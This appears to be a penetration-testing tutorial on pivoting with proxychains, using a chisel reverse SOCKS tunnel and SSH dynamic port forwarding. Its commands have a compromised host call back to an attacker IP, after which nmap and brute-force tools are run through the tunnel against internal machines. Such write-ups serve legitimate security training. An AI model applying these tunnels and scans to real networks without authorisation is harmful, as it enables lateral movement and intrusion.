Pivoting ( ProxyChains )

Pivoting lets the attacker access the services/machines the compromised machines connected to.
Pivoting allows the attacker to enlarge the attack surface by performing actions as the network-connected machine
Image by VickieLi
Tools Required:
  • ProxyChains
sudo apt install proxychains
  • SSH / CHISEL
NEED: With proxychains tools which are not available in the compromised machine can be used from the attaker machine (eg: medusa etc..,)
kali -> proxychains -> compromised_machine -> request for accessing from internal_machine -> internal_machine:80

Exploitation

  • After installing proxychains in the attackers machine
  • Configure the port that will be used by the proxychains with its protocol being SOCK Proxy
sudo vi /etc/proxychains.conf
# comment the last line 9050 --> used by TOR
# add the following
# socks5 127.0.0.1 <some port>
socks5 127.0.0.1 9051
  • Perform Dynamic port forwarding

Chisel

  • When SSH Password is not available, make use of chisel to perform
  • Start a chisel server on the attacker machine
# attacker IP: 192.168.1.1
# syntax: ./chisel server -p {port} --reverse
./chisel server -p 1337 --reverse
  • On the compromised machine connect to the attackers reverse connection
# syntax: chisel client {attacker IP}:{port on chisel server} R:socks
./chisel client 192.168.1.1:1337 R:socks # on a debian based machine
chisel.exe client 192.168.1.1:1337 R:socks # on a windows machine
  • Once the connection is made successfully from the compromised machine to the attackers machine, the chisel on the attackers machine will show the port the chisel is connected to
2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
  • By default chisel will connect on port 1080, so lets change the configuration in the proxychains to perform actions on this port (1080)
sudo vi /etc/proxychains.conf
# comment the last line 9050 --> used by TOR
# add the following
socks5 127.0.0.1 1080
  • Now we can execute commands with proxychains
proxychains nmap -p- internalIp
Proxychains with chisel
Legend

SSH

  • Perform Dynamic Port Forwarding
ssh -D 9051 [email protected] # 9051 is the port configured in proxychains.conf file
  • Once the connection initializes, an attacker can use proxychains to leverage the attack surface
Proxychains with SSH
  • Legend
    • 1 - Added the port 9051 in the /etc/proxychains config file
    • 2 - Inspecting the port activity of 9051 in attackers machine
    • 3 - Dynamic port forwarding to the port configured in proxychains -D 9051
    • 4 - Activity on the port 9051 in attakcers machine
    • 5 - Grabbing banner of the service running on port 25 in the compromised machine
    • 6 - Using proxy chains to obtain the banner of the service on port 25 in the compromised machine
Bruteforces / Automated attack tools can be used with proxychains